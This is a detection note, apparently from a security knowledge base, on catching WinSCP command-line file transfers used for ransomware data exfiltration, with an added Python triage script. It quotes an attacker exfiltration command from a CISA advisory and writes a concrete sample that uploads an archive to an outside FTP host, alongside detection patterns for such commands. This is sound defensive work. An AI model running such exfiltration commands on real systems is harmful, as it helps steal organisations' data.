# WinSCP Command-Line File Transfer

## What This Detects

WinSCP executed with command-line arguments indicating scripted or automated file transfer. This catches both explicit protocol URLs (`sftp://`, `ftp://`, `scp://`) and command-mode operation (`/command`, `/console`, `put`).

## Why It Matters

WinSCP is the second most common exfiltration tool across ransomware operations, behind Rclone. eSentire documented Hunters International using Rclone as the primary exfil tool with WinSCP as the fallback - a pattern also observed in Play and Akira intrusions. When network controls block Rclone's cloud sync protocols, operators pivot to WinSCP's SFTP/FTP capabilities.

Unlike GUI-mode WinSCP (which leaves minimal process creation telemetry), command-line mode with `/command` or protocol URLs in the arguments indicates automated or scripted transfer - the mode operators use.

## Observed In

- **Play** - `winscp.exe /command "open ftp://<USER>:<PASS>@<IP>" "put <FILE>" "exit"` - CISA AA23-352A
- **Play** - WinSCP installed from `C:\PerfLogs\WinSCP.rar`, executed multiple times for multi-session exfil
- **Akira** - WinSCP installed, used, uninstalled, reinstalled - operational cleanup pattern
- **Qilin** - WinSCP as alternative to Cyberduck for SFTP exfiltration
- **Hunters International** - WinSCP as Rclone fallback (eSentire TRU, Feb 2025)

## Detection Logic

```
Process Creation where:
  (Image ends with \winscp.exe OR \winscp.com)
  AND CommandLine contains any of: /command, /console, sftp://, ftp://, scp://
OR
  Product contains 'WinSCP'
  AND CommandLine contains any of: put, /upload, synchronize remote
```

## False Positive Guidance

WinSCP is legitimately used for scheduled file transfers in many enterprises (SFTP to payment processors, data feeds, partner integrations).

Baseline legitimate WinSCP usage by:

- Scheduled task parent process
- Known destination IPs
- Standard user accounts that run file transfers

Alert on WinSCP execution from admin accounts, from non-standard paths (especially `C:\PerfLogs\`, `C:\ProgramData\`, temp directories), or to previously unseen destination IPs.

## Related Threat Profiles

- [[Threat Profiles/RaaS/Akira]]
- [[Threat Profiles/RaaS/Qilin]]
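As an added example (not part of the original note), the following Python triage routine implements the Detection Logic above and then applies the False Positive Guidance baselining to constructed Sysmon-style process-creation events. The known-host set, admin-account set and scheduled-task parent images (`taskeng.exe`, `svchost.exe`) are assumptions to be tuned per environment.

```python
import re

# Rule terms taken directly from the note's detection logic.
IMAGE_SUFFIXES = ("\\winscp.exe", "\\winscp.com")
CLI_TERMS = ("/command", "/console", "sftp://", "ftp://", "scp://")
PRODUCT_TERMS = ("put", "/upload", "synchronize remote")
# Escalation/baseline settings: non-standard paths from the note; parents are an assumption.
SUSPICIOUS_DIRS = ("c:\\perflogs\\", "c:\\programdata\\", "\\temp\\", "\\tmp\\")
SCHEDULER_PARENTS = ("\\taskeng.exe", "\\svchost.exe")  # assumed scheduled-task parents
# Pull the destination host out of sftp://, ftp:// or scp:// URLs (credentials optional).
URL_HOST = re.compile(r"(?:sftp|ftp|scp)://(?:[^@\s\"]*@)?([A-Za-z0-9.\-\[\]:]+?)(?=[/\s\"']|$)", re.I)

def matches_rule(event):
    """True when the event satisfies either branch of the Process Creation logic."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    product = event.get("Product", "").lower()
    if image.endswith(IMAGE_SUFFIXES) and any(t in cmd for t in CLI_TERMS):
        return True
    return "winscp" in product and any(t in cmd for t in PRODUCT_TERMS)

def destination_hosts(cmd):
    return [h.lower() for h in URL_HOST.findall(cmd)]

def triage(event, known_hosts, admin_users):
    """Return (verdict, reasons): alert, review, baseline or no_match."""
    if not matches_rule(event):
        return ("no_match", [])
    reasons = []
    if any(d in event.get("Image", "").lower() for d in SUSPICIOUS_DIRS):
        reasons.append("non-standard path")
    if event.get("User", "").lower() in admin_users:
        reasons.append("admin account")
    unseen = [h for h in destination_hosts(event.get("CommandLine", "")) if h not in known_hosts]
    if unseen:
        reasons.append("unseen destination: " + ", ".join(unseen))
    scheduled = event.get("ParentImage", "").lower().endswith(SCHEDULER_PARENTS)
    if not reasons and scheduled:
        return ("baseline", ["scheduled task, known destination, standard user"])
    return ("alert" if reasons else "review", reasons)

# Constructed sample events and environment baseline (not real telemetry).
KNOWN_HOSTS = {"sftp.partner.example"}
ADMIN_USERS = {"corp\\administrator"}
SAMPLE_EVENTS = [
    {"Image": r"C:\PerfLogs\WinSCP\winscp.exe", "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"CORP\Administrator",
     "CommandLine": r'winscp.exe /command "open ftp://svc:Pass@203.0.113.10" "put C:\staging\export.7z" "exit"'},
    {"Image": r"C:\Program Files (x86)\WinSCP\winscp.com", "ParentImage": r"C:\Windows\System32\taskeng.exe",
     "User": r"CORP\svc_sftp", "CommandLine": r'winscp.com /command "open sftp://feeds@sftp.partner.example/" "put daily.csv" "exit"'},
    {"Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "User": r"CORP\jdoe", "CommandLine": r'"C:\Program Files (x86)\WinSCP\WinSCP.exe"'},  # GUI launch, no match
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev, KNOWN_HOSTS, ADMIN_USERS))
```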